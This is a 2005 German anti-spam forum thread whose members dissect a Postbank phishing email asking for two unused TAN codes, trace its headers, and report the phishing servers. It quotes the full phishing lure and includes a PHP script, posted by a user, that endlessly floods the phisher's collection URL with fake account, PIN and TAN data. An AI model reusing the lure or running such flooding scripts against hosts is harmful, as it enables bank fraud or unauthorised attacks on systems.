Warnung der Banksicherheitsdienst hinsichtlich der Internet - Misstaeter

[Raencker]

Return-Path: < [Link nur für registrierte Mitglieder sichtbar. ]>
Delivery-Date: Wed, 04 May 2005 21:17:18 +0200
Received: from [69.142.171.33] (helo=pcp09173423pcs.union01.nj.comcast.net)
by mxeu9.kundenserver.de with ESMTP (Nemesis),
id 0MKt64-1DTPMy2yZI-0000oV for *************************; Wed, 04 May 2005 21:17:16 +0200
Received: from unknown (HELO localhost) (127.0.0.1)
by localhost.napb.com with SMTP; Wed, 4 May 2005 22:19:27 +0000
Received: from 194.147.169.1 (194.147.169.1[194.147.169.1])
by pcp09173423pcs.union01.nj.comcast.net (IMP) with HTTP
for <*************************>; Wed, 4 May 2005 22:19:27 +0000
Message-ID: < [Link nur für registrierte Mitglieder sichtbar. ].comcast.net>
From: "PostBank.De" < [Link nur für registrierte Mitglieder sichtbar. ]>
To: "Kunde" <*************************>
Subject: Warnung der Banksicherheitsdienst hinsichtlich der Internet - Misstaeter
Date: Wed, 4 May 2005 22:19:27 +0000
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.2.2
X-Originating-IP: 194.147.169.1
Envelope-To: *************************




Sehr geehrter Kunde!
Wir sind erfreut, Ihnen mitzuteilen, dass Internet - Ueberweisungen ueber unsere Bank noch sicherer geworden sind!
Leider wurde von uns in der letzten Zeit, trotz der Anwendung von den TAN-Codes, eine ganze Reihe der Mitteldiebstaehle von den Konten unserer Kunden durch den Internetzugriff festgestellt.
Zur Zeit kennen wir die Methodik nicht, die die Missetaeter fuer die Entwendung der Angaben aus den TAN - Tabellen verwenden. Um die Missetaeter zu ermitteln und die Geldmittel von unseren Kunden unversehrt zu erhalten, haben wir entschieden, aus den TAN - Tabellen von unseren Kunden zwei aufeinanderfolgenden Codes zu entfernen.
Dafuer muessen Sie unsere Seite besuchen, wo Ihnen angeboten wird, eine spezielle Form auszufuellen. In dieser Form werden Sie ZWEI FOLGENDE TAN - CODEs, DIE SIE NOCH NICHT VERWENDET HABEN, EINTASTEN.

Achtung! Verwenden Sie diese zwei Codes in der Zukunft nicht mehr!
Wenn bei der Mittelueberweisung von Ihrem Konto gerade diese
TAN - Codes verwendet werden, so wird es fuer uns bedeuten, dass von Ihrem Konto eine nicht genehmigte Transitaktion ablaeuft und Ihr Konto wird unverzueglich bis zur Klaerung der Zahlungsumstaende gesperrt.
[Link nur für registrierte Mitglieder sichtbar. ]
Diese Massnahme dient Ihnen und Ihrem Geld zum Schutze! Wir bitten um Entschuldigung, wenn wir Ihnen die Unannehmlichkeiten bereitet haben.

Mit freundlichen Gruessen,
Bankverwaltung

&copy; 2004 Deutsche Postbank AG

[DocSnyder]

Du nimmst von einer Spamcast-Dialup-IP Mail an? Wer macht denn so etwas?
Schade dass der Site down ist. Ich hätte so gerne ein kleines Skriptchen darauf angesetzt...
/.
DocSnyder.
--
Friss, Spammer, friss: http://docsnyder.de/spl/forum/

[Major]

Die Seite http://202.84.232.81:8081 geht leider wieder; vor einem Moment war sie down.
Interessanterweise konnte ich auch eben auf http://202.84.232.81 zugreifen (ohne die Portangabe). Ich kam auf eine Seite für mobile payment, jetzt komme ich auf eine Seite "IBAIS UNIVERSITY Study Tour 2005".

[kork]

<?php
$i = 0;
while (1) {
$TAN1 = rand(100000,999999);
$TAN2 = rand(100000,999999);
$PIN = rand(10000,99999);
$Kon = rand(16267341,99182364);
$IP = rand(1,254).".".rand(1,254).".".rand(1,254).".".rand(1,254);
$body = "Kontonummer :$Kon
PIN: $PIN;
TAN1: $TAN1;
TAN2: $TAN2;
IP: ".$IP."

";
$body .= "---------------------------------------

";
$i++;
echo $i." Fake-Konten abgekippt
";
file("http://topdecash.com/postbank.php?body=".rawurlencode($body));
}
?>
*hust* Benutzung auf eigene Gefahr ;)
http://topdecash.com/ ist generell recht interessant.

[Goofy]

Da lässt der doch tatsächlich directory listing zu... wie unprofessionell.
Goofy

[homer]

Sehr interessant auch:
[Link nur für registrierte Mitglieder sichtbar. ]
Ist der so doof oder ist das ein Fake?

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCM/S/IT d- s++:++ a C++>$ UL++++/A++++/C++++$ P++++>$
L++> E+ W+ N++ !o !K w--- O M-- V-- PS+ PE Y+ PGP++ t 5
X++ R tv b+ !DI D+++ G e++ h---- r+++ y++++
------END GEEK CODE BLOCK------

[kork]

Ich tippe mal auf Blödheit - die log2.txt im Hauptverzeichnis wird ja laufend aktualisiert (man kann da reinschreiben, was immer man will ). Die im Unterverzeichnis ist wohl eine ältere...
€dit: Achja, der Phishzug, der dort ins log schreibt, ist http://202.56.225.252:8081/ (inzwischen connection refused) von heut früh um halb 6.

[schara56]

Microsoft Mail Internet Headers Version 2.0
Received: from xxxxxx.xx ([213.133.97.182]) by xxxxxx.xx with Microsoft SMTPSVC(6.0.3790.211);
Fri, 6 May 2005 03:47:09 +0200
Received: by xxxxxx.xx (Postfix, from userid 65534)
id CC73EE1A2; Wed, 4 May 2005 21:22:53 +0200 (CEST)
Received: from 66.169.223.151.ts46v-02.dntn.tx.charter.com (unknown [66.169.223.151])
by xxxxxx.xx (Postfix) with ESMTP id A4580E1A0
for < [Link nur für registrierte Mitglieder sichtbar. ]>; Wed, 4 May 2005 21:22:51 +0200 (CEST)
Received: from unknown (HELO localhost) (127.0.0.1)
by localhost.oirucur.com with SMTP; Fri, 6 May 2005 04:49:27 +0000
Received: from 215.11.57.142 (215.11.57.142[215.11.57.142])
by 66.169.223.151.ts46v-02.dntn.tx.charter.com (IMP) with HTTP
for < [Link nur für registrierte Mitglieder sichtbar. ]>; Fri, 6 May 2005 04:49:27 +0000
Message-ID: < [Link nur für registrierte Mitglieder sichtbar. ].tx.charter.com>
From: "PostBank.De" < [Link nur für registrierte Mitglieder sichtbar. ]>
To: " [Link nur für registrierte Mitglieder sichtbar. ]" < [Link nur für registrierte Mitglieder sichtbar. ]>
Subject: Warnung der Banksicherheitsdienst hinsichtlich der Internet - Misstaeter
Date: Fri, 6 May 2005 04:49:27 +0000
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.2.2
X-Originating-IP: 215.11.57.142
X-Spam-Checker-Version: SpamAssassin 2.64 (2004-01-11) on xxxxxx.xx
X-Spam-Status: No, hits=3.7 required=5.0 tests=HTML_50_60,HTML_MESSAGE,
MIME_HTML_ONLY,NORMAL_HTTP_TO_IP,TO_ADDRESS_EQ_REAL,WEIRD_PORT
autolearn=no version=2.64
X-Spam-Level: ***
Return-Path: [Link nur für registrierte Mitglieder sichtbar. ]
X-OriginalArrivalTime: 06 May 2005 01:47:09.0246 (UTC) FILETIME=[83E655E0:01C551DD]

Abgekippt über: 66.169.223.151 -> Charter Communications -> abuse[at]charter.net
Phishing Site: 202.56.225.252 -> Mother Daily-Sfd Enclave -> techsupport[at]bharti.com

[sis]

Welche Kontodaten soll ich da denn jetzt eingeben? Ich habe doch gar kein Postbank-Konto

Return-Path: < [Link nur für registrierte Mitglieder sichtbar. ]>
Received: from 83.102.234.222 ([83.102.234.222]) by .de
with esmtp id 1DUJkn-0KUh040; Sat, 7 May 2005 09:29:37 +0200
Received: from unknown (HELO localhost) (127.0.0.1)
by localhost.izi.com with SMTP; Sat, 7 May 2005 10:32:58 +0000
Received: from 178.177.47.13 (178.177.47.13[178.177.47.13])
by 83.102.234.222 (IMP) with HTTP
for <...>; Sat, 7 May 2005 10:32:58 +0000
Message-ID: <0123456789012345@83.102.234.222>
From: "PostBank" < [Link nur für registrierte Mitglieder sichtbar. ]>
To: "PostBank Kunde" <...>
Subject: Warnung der Banksicherheitsdienst hinsichtlich der Internet - Misstaeter
Date: Sat, 7 May 2005 10:32:58 +0000
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.2.2
X-Originating-IP: 178.177.47.13

Ein Ping auf die 178.177.47.13 bleibt erfolglos. Hat er wohl sein Modem abgeschaltet?
Phishing-Site:
202.79.211.23:8081 (Traceroute = Singapur)

[Goofy]

Ein Ping auf die 178.177.47.13 bleibt erfolglos.

Die ist ja auch von der IANA bisher nicht vergeben. Erkennbar immer daran, wenn man bei der whois-Suche nach einer IP auf die IANA verwiesen wird.
Diese X-Einträge sind sowieso i.d.R. fake.
Goofy